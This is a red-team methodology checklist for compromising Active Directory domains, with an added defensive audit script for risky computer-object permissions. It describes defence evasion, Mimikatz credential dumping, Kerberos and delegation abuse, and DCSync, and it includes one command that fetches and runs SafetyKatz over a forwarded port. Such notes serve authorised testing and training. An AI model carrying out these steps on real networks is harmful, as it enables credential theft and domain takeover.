Pentesting and Red Teaming Notes

Methodology

  • Bypass AppLocker and escape constrained language mode.

  • Bypass AMSI using various techniques.

  • Escalate privileges on the current machine.

  • Turn off Defender.

  • If constrained language mode (also known as controlled language mode) is enabled, check the AppLocker policy and run scripts from an allowed directory.

  • Enumerate the current domain, forest, domain policy, domain controllers, computers, users, Domain Admins/Enterprise Admins, groups, organizational units, GPOs and restricted groups using the AD module or PowerView. (Do not forget to check the description field of each user.)

  • Enumerate Group Policy Objects: get a list of all GPOs in the current domain, list all OUs (organizational units), and list the GPOs applied to each organizational unit.

  • Enumerate ACLs for groups (e.g. Domain Admins), get interesting ACEs, and ACLs for the domain, forest, etc. Focus on GenericAll and GenericWrite permissions and keep a note of them.

  • Enumerate trusts of the current domain, the current forest, another forest, all domains of another forest, and external trusts of all domains in the current forest.

  • Enumerate file shares, file servers and sensitive files.

  • Find machines where the current compromised user has local admin access, find computers where a domain admin or other high-value user has sessions, etc.

  • Run Mimikatz on the current machine and check for other users' credentials.

  • Access the machine where your user has admin rights using a lateral movement technique (e.g. winrs).

  • On that machine, disable antivirus first, then bypass .NET AMSI and regular AMSI (Invisi-Shell), and check the language mode; if it is constrained language mode, check the AppLocker policy and transfer a script (not an executable) to an allowed directory.

  • Run Mimikatz or SafetyKatz on that machine, bypassing defenses by first transferring Loader.exe and then port forwarding to download and execute Mimikatz/SafetyKatz from your initially compromised machine (C:\Users\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys).

  • Run overpass-the-hash (from your initial machine) using the credentials of the newly extracted users and again look for local admin access for that user on any other machine. This may throw an error, so try overpass-the-hash using BetterSafetyKatz (currently working), SafetyKatz or Rubeus (did not work), then run Invisi-Shell and use the Find-PSRemotingLocalAdminAccess.ps1 script.

  • If we do not find local admin access, mark your compromised user as owned in BloodHound and check for outbound object control rights, then check the shortest path from owned principals in BloodHound itself.

  • If we do not find local admin access, outbound object control rights or a shortest path from owned principals, use PowerUpSQL to check whether any SQL instances are accessible as sa.

  • Repeat the steps.

  • After obtaining domain admin, always perform DCSync to extract the hash of the krbtgt account.

  • In BloodHound, for each compromised user check whether they have GenericWrite or GenericAll permission over any other object (usually a computer object) and abuse it. (This is very important, do not forget it: if a compromised user has write access on a computer object, resource-based constrained delegation can be set up and abused.) Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'} (replace ciadmin with your compromised user to find interesting ACLs).

  • In BloodHound, after marking a user as compromised, remember to view Find Shortest Paths from Owned Principals, not only the object control rights or ACLs.

Note

If a machine has an AppLocker policy we cannot run Loader, because the policy may only allow scripts to run from a certain directory (note that only scripts are allowed here, not executables). So if we PS-remote to such a machine: first disable antivirus, check the AppLocker policy to see which directory scripts can run from, then try bypassing .NET AMSI, also try copying Invisi-Shell to that allowed directory and running it, and finally modify and copy the Invoke-Mimi.ps1 script to the allowed directory and execute it to harvest credentials.

  • After getting domain admin access, go for persistence.

  • If we do not find other paths after compromising a user (for example, our compromised user(s) do not have sessions or local admin rights on other machines), then check Kerberoasting as well as AS-REP roasting.

  • Check for a Set-SPN targeted Kerberoasting attack if you have GenericAll or GenericWrite privilege on a user.

  • Check for unconstrained delegation -> (able to escalate to enterprise administrator via the Print Spooler service).

  • Check for constrained delegation.

  • Check for resource-based constrained delegation (RBCD) -> (if a compromised user has write access on a computer object, RBCD can be set up and abused).

  • Check for privilege escalation via trusts / trust attacks (Priv-Esc-Trusts-Inside-Forest.md and Priv-Esc-Trusts-Across-Forest.md); read below.
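A defensive counterpart to the GenericAll/GenericWrite-on-computer-object checks above (the exposure that makes RBCD possible): an audit script added here, not part of the original notes, that lists principals outside an expected set holding those rights on computer objects. It assumes the RSAT ActiveDirectory module is installed; the $ExpectedPrincipals list is an assumption to adjust per environment.

```powershell
# Added audit example (not from the original notes). Lists ACEs that grant
# GenericAll or GenericWrite on computer objects to principals that are not
# in the expected set, i.e. the write access an RBCD abuse would need.
Import-Module ActiveDirectory

# Assumption: these principals are expected to hold write rights on computers.
$ExpectedPrincipals = @('Domain Admins', 'Enterprise Admins', 'SYSTEM', 'Administrators')

$GenericAll   = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$GenericWrite = [System.DirectoryServices.ActiveDirectoryRights]::GenericWrite

Get-ADComputer -Filter * | ForEach-Object {
    $computer = $_
    # The AD: PSDrive is created by the ActiveDirectory module import above.
    $acl = Get-Acl -Path ("AD:\" + $computer.DistinguishedName)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Require the full GenericAll or GenericWrite mask, not just one bit of it,
        # so property-specific WriteProperty ACEs do not show up as false positives.
        $hasAll   = (($ace.ActiveDirectoryRights -band $GenericAll)   -eq $GenericAll)
        $hasWrite = (($ace.ActiveDirectoryRights -band $GenericWrite) -eq $GenericWrite)
        if (-not ($hasAll -or $hasWrite)) { continue }
        # Strip the DOMAIN\ or BUILTIN\ prefix before comparing with the expected set.
        $name = $ace.IdentityReference.Value.Split('\')[-1]
        if ($ExpectedPrincipals -contains $name) { continue }
        [pscustomobject]@{
            Computer  = $computer.Name
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.ActiveDirectoryRights
            Inherited = $ace.IsInherited
        }
    }
} | Sort-Object Principal, Computer | Format-Table -AutoSize
```

Any row in the output is a principal whose compromise would let an attacker set up RBCD on that computer; review and remove the ACE unless it is deliberate.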

Compromising other domains

  • Check for AD CS misconfigurations for privilege escalation (AD CS misconfigurations allow privilege escalation to both domain administrator and enterprise administrator).

  • Finally, check for SQL instances you can connect to, check the database links and see whether command execution is possible; if we have SA privilege on any instance, try command execution to move laterally (remember: after compromising every new user, use overpass-the-hash, check which instances you can connect to, abuse them and continue the cycle).


Last updated 9 months ago